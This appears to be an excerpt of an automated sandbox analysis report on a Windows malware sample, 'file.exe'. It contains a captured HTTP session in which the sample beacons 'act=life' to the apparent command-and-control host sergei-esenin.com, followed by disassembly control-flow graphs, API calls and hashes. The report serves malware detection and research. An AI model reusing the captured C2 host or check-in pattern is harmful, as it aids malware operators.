                                                                                                    2024-10-07 21:23:15 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.749704104.21.53.84437100C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-07 21:23:15 UTC264OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8
                                                                                                    Host: sergei-esenin.com
                                                                                                    2024-10-07 21:23:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                    Data Ascii: act=life
                                                                                                    2024-10-07 21:23:16 UTC772INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 07 Oct 2024 21:23:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=4c1mfmtctdkph64pqkd3kvq5ar; expires=Fri, 31 Jan 2025 15:09:55 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHQYx1WtnNhiM0PBelyzBbrwNuhNIwCBNDdae%2BPNyIJBkANUNSqgz%2F5pLZB8pzJ25k6hGDfaHUziQmINWt71cCrI848Y2f3NVp3j0iWYXTI8HxH1TQB323ALsklDwARKGhS1hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8cf0f3885fa58c65-EWR
                                                                                                    2024-10-07 21:23:16 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                    Data Ascii: aerror #D12
                                                                                                    2024-10-07 21:23:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Target ID:3
                                                                                                    Start time:17:23:08
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0xda0000
                                                                                                    File size:1'872'384 bytes
                                                                                                    MD5 hash:92DD1108DBDEBF3163C394DEB38B0278
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:61.1%
                                                                                                      Total number of Nodes:54
                                                                                                      Total number of Limit Nodes:7
                                                                                                      execution_graph 20743 db049b 20747 db0227 20743->20747 20744 db0455 20746 de5700 2 API calls 20744->20746 20748 db0308 20746->20748 20747->20744 20747->20748 20749 de5700 20747->20749 20750 de571b 20749->20750 20751 de5797 20749->20751 20754 de578c 20749->20754 20755 de5729 20749->20755 20750->20751 20750->20754 20750->20755 20756 de3220 20751->20756 20752 de5776 RtlReAllocateHeap 20752->20754 20754->20744 20755->20752 20757 de32ac 20756->20757 20758 de32a2 RtlFreeHeap 20756->20758 20759 de3236 20756->20759 20757->20754 20758->20757 20759->20758 20760 de673d 20761 de66aa 20760->20761 20762 de6793 20761->20762 20765 de5bb0 LdrInitializeThunk 20761->20765 20764 de67b3 20765->20764 20766 de50fa 20767 de514c 20766->20767 20768 de5176 LoadLibraryExW 20766->20768 20767->20768 20769 de518c 20768->20769 20775 de64b8 20777 de63f2 20775->20777 20776 de646e 20777->20776 20779 de5bb0 LdrInitializeThunk 20777->20779 20779->20776 20780 dad110 20784 dad119 20780->20784 20781 dad2ee ExitProcess 20782 dad2e9 20787 de56e0 FreeLibrary 20782->20787 20784->20781 20784->20782 20786 db0b40 FreeLibrary 20784->20786 20786->20782 20787->20781 20788 de60d2 20790 de60fa 20788->20790 20789 de614e 20793 de5bb0 LdrInitializeThunk 20789->20793 20790->20789 20794 de5bb0 LdrInitializeThunk 20790->20794 20793->20789 20794->20789 20808 de626a 20809 de628d 20808->20809 20810 de62de 20809->20810 20815 de5bb0 LdrInitializeThunk 20809->20815 20813 de636e 20810->20813 20814 de5bb0 LdrInitializeThunk 20810->20814 20814->20813 20815->20810 20816 ddd9cb 20817 ddd9fb 20816->20817 20819 ddda65 20817->20819 20820 de5bb0 LdrInitializeThunk 20817->20820 20820->20817 20821 dafca0 20824 dafcdc 20821->20824 20822 daffe4 20823 de3220 RtlFreeHeap 20823->20822 20824->20822 20824->20823 20825 de3202 RtlAllocateHeap

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 25 de50fa-de514a 26 de514c-de514f 25->26 27 de5176-de5186 LoadLibraryExW 25->27 28 de5150-de5174 call de5a50 26->28 29 de518c-de51b5 27->29 30 de52d8-de5304 27->30 28->27 29->30
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00DE5182
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: <I$)$<I$)$@^
                                                                                                      • API String ID: 1029625771-935358343
                                                                                                      • Opcode ID: 7fccef61d520214b59b6ecce9e8e991f6755bbf9b7ef49187a986ea8cafcf18a
                                                                                                      • Instruction ID: 6c27fe8e1fe35673765158430f86fc27f86bfd2d4ba29b9a78b3db0bb973cba1
                                                                                                      • Opcode Fuzzy Hash: 7fccef61d520214b59b6ecce9e8e991f6755bbf9b7ef49187a986ea8cafcf18a
                                                                                                      • Instruction Fuzzy Hash: D6218E351083848FC300EF68E891B6AF7E4AB6A344F6A882CE1C5D7352D776D915CB66

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 33 dafca0-dafcda 34 dafd0b-dafe22 33->34 35 dafcdc-dafcdf 33->35 37 dafe5b-dafe8c 34->37 38 dafe24 34->38 36 dafce0-dafd09 call db2690 35->36 36->34 41 dafe8e-dafe8f 37->41 42 dafeb6-dafec5 call db0b50 37->42 40 dafe30-dafe59 call db2760 38->40 40->37 46 dafe90-dafeb4 call db2700 41->46 48 dafeca-dafecf 42->48 46->42 51 daffe4-daffe6 48->51 52 dafed5-dafef8 48->52 55 db01b1-db01bb 51->55 53 dafefa 52->53 54 daff2b-daff2d 52->54 56 daff00-daff29 call db27e0 53->56 57 daff30-daff3a 54->57 56->54 59 daff3c-daff3f 57->59 60 daff41-daff49 57->60 59->57 59->60 62 daff4f-daff76 60->62 63 db01a2-db01ad call de3220 60->63 65 daffab-daffb5 62->65 66 daff78 62->66 63->55 68 daffeb 65->68 69 daffb7-daffbb 65->69 67 daff80-daffa9 call db2840 66->67 67->65 73 daffed-daffef 68->73 72 daffc7-daffcb 69->72 75 db019a 72->75 76 daffd1-daffd8 72->76 73->75 77 dafff5-db002c 73->77 75->63 78 daffda-daffdc 76->78 79 daffde 76->79 80 db005b-db0065 77->80 81 db002e-db002f 77->81 78->79 85 daffc0-daffc5 79->85 86 daffe0-daffe2 79->86 83 db0067-db006f 80->83 84 db00a4 80->84 82 db0030-db0059 call db28a0 81->82 82->80 88 db0087-db008b 83->88 89 db00a6-db00a8 84->89 85->72 85->73 86->85 88->75 91 db0091-db0098 88->91 89->75 92 db00ae-db00c5 89->92 93 db009a-db009c 91->93 94 db009e 91->94 95 db00fb-db0102 92->95 96 db00c7 92->96 93->94 99 db0080-db0085 94->99 100 db00a0-db00a2 94->100 97 db0130-db013c 95->97 98 db0104-db010d 95->98 101 db00d0-db00f9 call db2900 96->101 104 db01c2-db01c7 97->104 103 db0117-db011b 98->103 99->88 99->89 100->99 101->95 103->75 106 db011d-db0124 103->106 104->63 107 db012a 106->107 108 db0126-db0128 106->108 109 db012c-db012e 107->109 110 db0110-db0115 107->110 108->107 109->110 110->103 111 db0141-db0143 110->111 111->75 112 db0145-db015b 111->112 112->104 113 db015d-db015f 112->113 114 db0163-db0166 113->114 115 db0168-db0188 call db2030 114->115 116 db01bc 114->116 119 db018a-db0190 115->119 120 db0192-db0198 115->120 116->104 119->114 119->120 120->104
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: J|BJ$V$VY^_$t
                                                                                                      • API String ID: 0-3701112211
                                                                                                      • Opcode ID: 205cd29789d7db55a682231b7dfd5c0f3d6233988aa11d5021426d986a9a779c
                                                                                                      • Instruction ID: a4f21afa65bb089ed1b72df2c62fc0d837ebd35bc00836f4342f16640d9eb378
                                                                                                      • Opcode Fuzzy Hash: 205cd29789d7db55a682231b7dfd5c0f3d6233988aa11d5021426d986a9a779c
                                                                                                      • Instruction Fuzzy Hash: F4D176755083909BD315DF58849466FBFE1AF96B84F18886CF4CA8B212C336CD09DBA2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 157 dad110-dad11b call de4cc0 160 dad2ee-dad2f6 ExitProcess 157->160 161 dad121-dad130 call ddc8d0 157->161 165 dad2e9 call de56e0 161->165 166 dad136-dad15f 161->166 165->160 170 dad161 166->170 171 dad196-dad1bf 166->171 172 dad170-dad194 call dad300 170->172 173 dad1c1 171->173 174 dad1f6-dad20c 171->174 172->171 178 dad1d0-dad1f4 call dad370 173->178 175 dad239-dad23b 174->175 176 dad20e-dad20f 174->176 181 dad23d-dad25a 175->181 182 dad286-dad2aa 175->182 180 dad210-dad237 call dad3e0 176->180 178->174 180->175 181->182 186 dad25c-dad25f 181->186 187 dad2ac-dad2af 182->187 188 dad2d6 call dae8f0 182->188 191 dad260-dad284 call dad440 186->191 192 dad2b0-dad2d4 call dad490 187->192 194 dad2db-dad2dd 188->194 191->182 192->188 194->165 197 dad2df-dad2e4 call db2f10 call db0b40 194->197 197->165
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00DAD2F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: bade6e60f3061352cd6e191409660bdaaac8b4030a7094044da536a624028a8d
                                                                                                      • Instruction ID: 4c1ca54ac28ee16eedbbe5c8763c633d7540703adb4a4d6b0ec852495a0c0de5
                                                                                                      • Opcode Fuzzy Hash: bade6e60f3061352cd6e191409660bdaaac8b4030a7094044da536a624028a8d
                                                                                                      • Instruction Fuzzy Hash: 43413070409380ABD701AB68D184A2EFBF6EF92744F188C0CE5C59B612C33AD810CB7B

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 202 de5700-de5714 203 de578c-de5795 call de31a0 202->203 204 de571b-de5722 202->204 205 de5729-de574a 202->205 206 de5797-de57a5 call de3220 202->206 207 de57b2 202->207 208 de57b0 202->208 213 de57b4-de57b9 203->213 204->205 204->206 204->207 204->208 209 de574c-de574f 205->209 210 de5776-de578a RtlReAllocateHeap 205->210 206->208 207->213 208->207 214 de5750-de5774 call de5b30 209->214 210->213 214->210
                                                                                                      APIs
                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00DE5784
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 89cf24374e789f7ade3d69ec30623120b7dfa2e0adb1ff1de1802ce42c1fd8d3
                                                                                                      • Instruction ID: 3eb73d05cd6c4f79b2ff5c208823eb11d15f641caa742a15d66d4aaf5df6d7e1
                                                                                                      • Opcode Fuzzy Hash: 89cf24374e789f7ade3d69ec30623120b7dfa2e0adb1ff1de1802ce42c1fd8d3
                                                                                                      • Instruction Fuzzy Hash: 0D118C7191C280EBC701BF29E844A2BBBE6EF86754F058828E4C4DB315D335D961CBB2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 229 de5bb0-de5be2 LdrInitializeThunk
                                                                                                      APIs
                                                                                                      • LdrInitializeThunk.NTDLL(00DE973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00DE5BDE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 258 de695b-de696b call de4a20 261 de696d 258->261 262 de6981-de6a02 258->262 263 de6970-de697f 261->263 264 de6a36-de6a42 262->264 265 de6a04 262->265 263->262 263->263 266 de6a44-de6a4f 264->266 267 de6a85-de6a9f 264->267 268 de6a10-de6a34 call de73e0 265->268 269 de6a50-de6a57 266->269 268->264 271 de6a59-de6a5c 269->271 272 de6a60-de6a66 269->272 271->269 274 de6a5e 271->274 272->267 275 de6a68-de6a7d call de5bb0 272->275 274->267 277 de6a82 275->277 277->267
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 30c1821611d541121ddd4b3a2f50c42454733588d652b53204c0ca4fd859c8da
                                                                                                      • Instruction ID: 6fab0f8b09d57be5150be12720d141ea3e5094f14ac1f74f7f16f63dd35a34e8
                                                                                                      • Opcode Fuzzy Hash: 30c1821611d541121ddd4b3a2f50c42454733588d652b53204c0ca4fd859c8da
                                                                                                      • Instruction Fuzzy Hash: 233198B09083419FD718EF16D89073AB7F2EF94384F58882CE5C697262E334D904CB66

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 278 db049b-db0515 call dac9f0 282 db045b-db0469 call de5700 278->282 283 db03fb-db0414 278->283 284 db0339-db034f 278->284 285 db035f-db0367 278->285 286 db03be 278->286 287 db03de-db03e3 278->287 288 db051c-db051e 278->288 289 db0393-db0397 278->289 290 db0472-db0477 278->290 291 db0311-db0332 278->291 292 db0370-db037e 278->292 293 db03d0-db03d7 278->293 294 db0417-db0430 278->294 295 db0356 278->295 296 db0308-db030c 278->296 297 db03ec-db03f4 278->297 298 db0242-db0244 278->298 299 db0482-db0484 278->299 300 db0440-db0458 call de5700 278->300 301 db0480 278->301 302 db0227-db023b 278->302 303 db0246-db0260 278->303 304 db0386-db038c 278->304 282->290 283->294 284->282 284->283 284->285 284->286 284->287 284->289 284->290 284->292 284->293 284->294 284->295 284->297 284->299 284->300 284->301 284->304 285->292 286->293 287->297 308 db0520-db0b30 288->308 316 db03a0-db03b7 289->316 290->301 291->282 291->283 291->284 291->285 291->286 291->287 291->289 291->290 291->292 291->293 291->294 291->295 291->297 291->299 291->300 291->301 291->304 292->304 293->283 293->287 293->289 293->290 293->294 293->297 293->299 293->301 293->304 294->300 295->285 306 db048d-db0496 296->306 297->283 297->289 297->290 297->299 297->301 309 db0296-db02bd 298->309 299->306 300->282 302->282 302->283 302->284 302->285 302->286 302->287 302->289 302->290 302->291 302->292 302->293 302->294 302->295 302->296 302->297 302->298 302->299 302->300 302->301 302->303 302->304 310 db0262 303->310 311 db0294 303->311 304->289 304->290 304->299 304->301 306->308 318 db02ea-db0301 309->318 319 db02bf 309->319 317 db0270-db0292 call db2eb0 310->317 311->309 316->282 316->283 316->286 316->287 316->289 316->290 316->293 316->294 316->297 316->299 316->300 316->301 316->304 317->311 318->282 318->283 318->284 318->285 318->286 318->287 318->289 318->290 318->291 318->292 318->293 318->294 318->295 318->296 318->297 318->299 318->300 318->301 318->304 325 db02c0-db02e8 call db2e70 319->325 325->318
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a0e79eb5a88285677fe1af952b09dc780b0721f68b1572ae32ee24ad3378dee
                                                                                                      • Instruction ID: 442a8d0f9f7ad148473dccccb992319b08e7b6a3b977423ba74972c65d2463f5
                                                                                                      • Opcode Fuzzy Hash: 6a0e79eb5a88285677fe1af952b09dc780b0721f68b1572ae32ee24ad3378dee
                                                                                                      • Instruction Fuzzy Hash: F3914675200B40CFD7249F25E894A27B7F6FF89314B158A6CE896CBBA1D731E815CB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dcd18621640bac6519fc707a078df1dab2aef115fe8e47ce71e8f8ece1d877d0
                                                                                                      • Instruction ID: 3b40b766855e5242870d9a6f1706818931a917567f7b75704e9da1f6ef6b8143
                                                                                                      • Opcode Fuzzy Hash: dcd18621640bac6519fc707a078df1dab2aef115fe8e47ce71e8f8ece1d877d0
                                                                                                      • Instruction Fuzzy Hash: 5E714775200B40DFD7249F25E894B27BBF6FF89314F148968E896CB662C731E815CB60
                                                                                                      Memory Dump Source
